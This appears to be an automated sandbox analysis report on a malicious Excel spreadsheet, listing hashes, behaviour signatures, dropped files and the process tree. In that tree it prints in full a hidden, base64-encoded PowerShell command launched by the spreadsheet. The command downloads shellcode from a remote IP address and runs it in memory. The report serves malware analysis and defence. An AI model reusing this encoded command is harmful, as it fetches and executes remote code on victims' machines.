Analysis

  • max time kernel
    47s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 21:59

General

  • Target

    39c65059914e579c24ffa04024b2ea4f3568e52f622dc49160086afd01764a12.xls

  • Size

    46KB

  • MD5

    4c763330b1ec57574746ce178d9f21c2

  • SHA1

    9b8075d73f179184e756b20fb238a8cc8fc5a11a

  • SHA256

    39c65059914e579c24ffa04024b2ea4f3568e52f622dc49160086afd01764a12

  • SHA512

    0b3d039e3414c2a0ce3e449628003ea0cba8a5cf8c311a67edf742f4ba11d3b39ab5997451bd8b21bd0ecb3e66fdc7873340fac519634145307a8f98a31680ae

  • SSDEEP

    768:t4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:6SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\39c65059914e579c24ffa04024b2ea4f3568e52f622dc49160086afd01764a12.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA400.tmp" "c:\Users\Admin\AppData\Local\Temp\2tfg54oe\CSC87B6320ECF734F719C99E2F7FA7B1091.TMP"
          4⤵
            PID:2180

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.dll

      Filesize

      3KB

      MD5

      1db3cddfd76f20c3ebe9efcd249c08ab

      SHA1

      ae08d143470bf0670d62874be35f9c87599d444a

      SHA256

      8d31529513803ba546cbf51405bac7b15c747829a93af32bc3aae076c5d5fff6

      SHA512

      6fa995373ade65ac496dc821d19b7559b7f19f80f639fc7529ed79bef061d081fd96060c3c903b754d78d1eee0b8fa902c971d8941e9b35902b12e0bd3a492eb

    • C:\Users\Admin\AppData\Local\Temp\RESA400.tmp

      Filesize

      1KB

      MD5

      abf00d3519c4805ed0506920b4fbc3d0

      SHA1

      17a245d54cc107ef9bad15844101076fbcfec2f6

      SHA256

      d7cc8e0c72d8ded2927b3692eb68df8758a0205ed997df8e462786f38222b832

      SHA512

      715433056038cbda1dd659020acf9a1b202b263c044fc80cd1ef96f346339a925b2a70da2d5eaaf75d5ec31bc720e6b55964b9431784b6582c611e687d879fc6

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggggxmdr.mxe.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      1KB

      MD5

      07528f0dc65ab406f8d1b737b8036feb

      SHA1

      b352b0c99854acc0aed3059872ac061ed2c19bc5

      SHA256

      c80b12b452b9713bbe88bb9a53d702585a4a8044f9573cc7183d5ca490eaebcb

      SHA512

      acc76784e8ba3741c9209fa388507c258f4d82e976085619b2429df3a8ee12fcb5f86db9ae6c88afc6f6c44a107a2af4ac3219a38d23e797e5c253307f61a570

    • \??\c:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.cmdline

      Filesize

      369B

      MD5

      97f2b2defed4b6642ec630bd351d9479

      SHA1

      52011a1843452ee7773dd5c1d85cdf582271fb17

      SHA256

      79911b63f086de8439e5022cb13de7b248e1b864fedd958efaa7066694633761

      SHA512

      c1921ac53f61df2e96fb5f204e0cf1db37ccf2eb223ac439f6d4a543743da0affee6d9cb6fe93387b306788b2b23c38d5c00bdbaabd857b68ca75ab10053d373

    • \??\c:\Users\Admin\AppData\Local\Temp\2tfg54oe\CSC87B6320ECF734F719C99E2F7FA7B1091.TMP

      Filesize

      652B

      MD5

      18be990fc2a56718102eee491690fdf2

      SHA1

      db615692d116c962eca7ef67d0022f4964cbb879

      SHA256

      158c72ba8287bf4199af28c20102060a5b82a68f19ddbcfd97744edf204e09f0

      SHA512

      cd5925e07b1f87501defc00dcaee1301152636c7251b2aa5b24981d55c294874dde64b679f180cfe65f93b276372f83b9565afedc4139e290d8c2b97f4cc5aaa

    • memory/1404-8-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-28-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-9-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-11-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-13-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-14-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp

      Filesize

      64KB

    • memory/1404-12-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-16-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-17-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp

      Filesize

      64KB

    • memory/1404-19-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-18-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-15-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-7-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

      Filesize

      64KB

    • memory/1404-2-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

      Filesize

      64KB

    • memory/1404-29-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-4-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

      Filesize

      64KB

    • memory/1404-10-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-6-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-5-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-0-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

      Filesize

      64KB

    • memory/1404-1-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

      Filesize

      64KB

    • memory/1404-3-0x00007FFD547AD000-0x00007FFD547AE000-memory.dmp

      Filesize

      4KB

    • memory/1404-67-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-61-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-62-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/1404-66-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

      Filesize

      2.0MB

    • memory/4992-57-0x000001F3AF0E0000-0x000001F3AF0E8000-memory.dmp

      Filesize

      32KB

    • memory/4992-44-0x000001F3C7330000-0x000001F3C7352000-memory.dmp

      Filesize

      136KB